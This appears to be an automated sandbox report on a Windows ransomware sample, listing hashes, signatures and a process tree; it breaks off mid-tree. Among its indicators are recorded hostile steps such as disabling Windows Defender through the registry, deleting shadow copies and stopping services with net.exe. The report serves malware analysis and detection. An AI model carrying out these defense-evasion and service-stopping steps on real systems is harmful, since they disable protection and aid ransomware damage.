Analysis
-
max time kernel
75s -
max time network
3s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
13-01-2022 10:00
Static task
static1
Behavioral task
behavioral1
Sample
69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
Resource
win10-en-20211208
General
-
Target
69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
-
Size
3.6MB
-
MD5
5bd555b0d8e12806fbdbbcc3971b1f67
-
SHA1
2da4a3e94754c2f94b5f440a68ac0a3b979d3242
-
SHA256
69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d
-
SHA512
cc3f5199621435a1d04546a7446557378933ab9f42b5b638b8fbdf4805661ac38312d68801dd017fd1665cfe2a5d26c198b2cfd1b0193389c4891bc0e982e13c
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2128 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 2064 bcdedit.exe 2088 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200377.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_settings.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application-views.xml.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tehran.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Windows Media Player\de-DE\WMPDMC.exe.mui 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\fr-FR\cpu.html 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_left_over.gif.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WEBPAGE.DPV.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\03_lastfm.luac.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0291794.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_rainy.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00057_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\css\localizedSettings.css 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\search_background.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\css\localizedSettings.css 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY01006_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSTH7ES.LEX.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\es-ES\TipRes.dll.mui 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ENGIDX.DAT.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\BlackTieNewsletter.dotx.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00272_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18238_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\Verisign\Components\VeriSign_Class_3_Public_Primary_CA.cer.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImage.jpg.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD09194_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_03.MID.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\POSTCD98.POC.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WEBHOME.POC.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0199661.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-hot.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00559_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\THMBNAIL.PNG.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBCOLOR.SCM.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_up.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Manaus.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.zh_CN_5.5.0.165303.jar.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana\TAB_ON.GIF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00038_.GIF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD00155_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02073_.GIF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-gibbous_partly-cloudy.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Qatar.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107130.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03795_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\HEADING.JPG.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\9.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\11.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\de-DE\msadcor.dll.mui 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0240189.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignright.gif.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGBOXES.XML.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\AdjacencyMergeLetter.dotx.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\js\localizedStrings.js 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0214948.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\jquery.jstree.js.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 832 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exe69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exepid process 2160 powershell.exe 2244 powershell.exe 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1384 wevtutil.exe Token: SeBackupPrivilege 1384 wevtutil.exe Token: SeSecurityPrivilege 1716 wevtutil.exe Token: SeBackupPrivilege 1716 wevtutil.exe Token: SeSecurityPrivilege 564 wevtutil.exe Token: SeBackupPrivilege 564 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1620 wmic.exe Token: SeSecurityPrivilege 1620 wmic.exe Token: SeTakeOwnershipPrivilege 1620 wmic.exe Token: SeLoadDriverPrivilege 1620 wmic.exe Token: SeSystemProfilePrivilege 1620 wmic.exe Token: SeSystemtimePrivilege 1620 wmic.exe Token: SeProfSingleProcessPrivilege 1620 wmic.exe Token: SeIncBasePriorityPrivilege 1620 wmic.exe Token: SeCreatePagefilePrivilege 1620 wmic.exe Token: SeBackupPrivilege 1620 wmic.exe Token: SeRestorePrivilege 1620 wmic.exe Token: SeShutdownPrivilege 1620 wmic.exe Token: SeDebugPrivilege 1620 wmic.exe Token: SeSystemEnvironmentPrivilege 1620 wmic.exe Token: SeRemoteShutdownPrivilege 1620 wmic.exe Token: SeUndockPrivilege 1620 wmic.exe Token: SeManageVolumePrivilege 1620 wmic.exe Token: 33 1620 wmic.exe Token: 34 1620 wmic.exe Token: 35 1620 wmic.exe Token: SeIncreaseQuotaPrivilege 1400 wmic.exe Token: SeSecurityPrivilege 1400 wmic.exe Token: SeTakeOwnershipPrivilege 1400 wmic.exe Token: SeLoadDriverPrivilege 1400 wmic.exe Token: SeSystemProfilePrivilege 1400 wmic.exe Token: SeSystemtimePrivilege 1400 wmic.exe Token: SeProfSingleProcessPrivilege 1400 wmic.exe Token: SeIncBasePriorityPrivilege 1400 wmic.exe Token: SeCreatePagefilePrivilege 1400 wmic.exe Token: SeBackupPrivilege 1400 wmic.exe Token: SeRestorePrivilege 1400 wmic.exe Token: SeShutdownPrivilege 1400 wmic.exe Token: SeDebugPrivilege 1400 wmic.exe Token: SeSystemEnvironmentPrivilege 1400 wmic.exe Token: SeRemoteShutdownPrivilege 1400 wmic.exe Token: SeUndockPrivilege 1400 wmic.exe Token: SeManageVolumePrivilege 1400 wmic.exe Token: 33 1400 wmic.exe Token: 34 1400 wmic.exe Token: 35 1400 wmic.exe Token: SeIncreaseQuotaPrivilege 1400 wmic.exe Token: SeSecurityPrivilege 1400 wmic.exe Token: SeTakeOwnershipPrivilege 1400 wmic.exe Token: SeLoadDriverPrivilege 1400 wmic.exe Token: SeSystemProfilePrivilege 1400 wmic.exe Token: SeSystemtimePrivilege 1400 wmic.exe Token: SeProfSingleProcessPrivilege 1400 wmic.exe Token: SeIncBasePriorityPrivilege 1400 wmic.exe Token: SeCreatePagefilePrivilege 1400 wmic.exe Token: SeBackupPrivilege 1400 wmic.exe Token: SeRestorePrivilege 1400 wmic.exe Token: SeShutdownPrivilege 1400 wmic.exe Token: SeDebugPrivilege 1400 wmic.exe Token: SeSystemEnvironmentPrivilege 1400 wmic.exe Token: SeRemoteShutdownPrivilege 1400 wmic.exe Token: SeUndockPrivilege 1400 wmic.exe Token: SeManageVolumePrivilege 1400 wmic.exe Token: 33 1400 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1792 wrote to memory of 520 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1792 wrote to memory of 520 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1792 wrote to memory of 520 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 520 wrote to memory of 540 520 net.exe net1.exe PID 520 wrote to memory of 540 520 net.exe net1.exe PID 520 wrote to memory of 540 520 net.exe net1.exe PID 1792 wrote to memory of 760 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1792 wrote to memory of 760 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1792 wrote to memory of 760 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 760 wrote to memory of 1624 760 net.exe net1.exe PID 760 wrote to memory of 1624 760 net.exe net1.exe PID 760 wrote to memory of 1624 760 net.exe net1.exe PID 1792 wrote to memory of 1740 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1792 wrote to memory of 1740 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1792 wrote to memory of 1740 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1740 wrote to memory of 832 1740 net.exe net1.exe PID 1740 wrote to memory of 832 1740 net.exe net1.exe PID 1740 wrote to memory of 832 1740 net.exe net1.exe PID 1792 wrote to memory of 1812 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1792 wrote to memory of 1812 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1792 wrote to memory of 1812 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1812 wrote to memory of 360 1812 net.exe net1.exe PID 1812 wrote to memory of 360 1812 net.exe net1.exe PID 1812 wrote to memory of 360 1812 net.exe net1.exe PID 1792 wrote to memory of 1788 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1792 wrote to memory of 1788 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1792 wrote to memory of 1788 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1788 wrote to memory of 828 1788 net.exe net1.exe PID 1788 wrote to memory of 828 1788 net.exe net1.exe PID 1788 wrote to memory of 828 1788 net.exe net1.exe PID 1792 wrote to memory of 1828 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1792 wrote to memory of 1828 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1792 wrote to memory of 1828 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1828 wrote to memory of 1112 1828 net.exe net1.exe PID 1828 wrote to memory of 1112 1828 net.exe net1.exe PID 1828 wrote to memory of 1112 1828 net.exe net1.exe PID 1792 wrote to memory of 1068 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1792 wrote to memory of 1068 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1792 wrote to memory of 1068 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1068 wrote to memory of 1928 1068 net.exe net1.exe PID 1068 wrote to memory of 1928 1068 net.exe net1.exe PID 1068 wrote to memory of 1928 1068 net.exe net1.exe PID 1792 wrote to memory of 1804 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1792 wrote to memory of 1804 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1792 wrote to memory of 1804 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1804 wrote to memory of 1976 1804 net.exe net1.exe PID 1804 wrote to memory of 1976 1804 net.exe net1.exe PID 1804 wrote to memory of 1976 1804 net.exe net1.exe PID 1792 wrote to memory of 1652 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 1792 wrote to memory of 1652 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 1792 wrote to memory of 1652 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 1792 wrote to memory of 680 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 1792 wrote to memory of 680 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 1792 wrote to memory of 680 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 1792 wrote to memory of 1312 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 1792 wrote to memory of 1312 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 1792 wrote to memory of 1312 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 1792 wrote to memory of 1296 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 1792 wrote to memory of 1296 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 1792 wrote to memory of 1296 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 1792 wrote to memory of 1756 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 1792 wrote to memory of 1756 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 1792 wrote to memory of 1756 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 1792 wrote to memory of 1440 1792 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe"C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:540
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:760 -
